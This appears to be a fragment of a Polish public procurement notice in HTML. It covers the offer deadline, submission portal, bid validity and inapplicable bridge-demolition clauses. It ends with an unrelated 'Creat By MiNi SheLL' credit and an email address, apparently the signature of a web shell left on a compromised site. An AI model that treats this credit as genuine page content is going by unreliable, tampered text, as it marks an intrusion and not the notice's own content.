Wynagrodzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/nadlesnictwo_karnieszewice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-15 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W związku z częściowym wykonaniem prac rozbiórkowych przez poprzedniego Wykonawcę zapisy w SST dotyczące prac rozbiórkowych związanych z demontażem przęsła mostowego oraz konstrukcjami wsporczymi nie mają zastosowania.

Creat By MiNi SheLL
Email: jattceo@gmail.com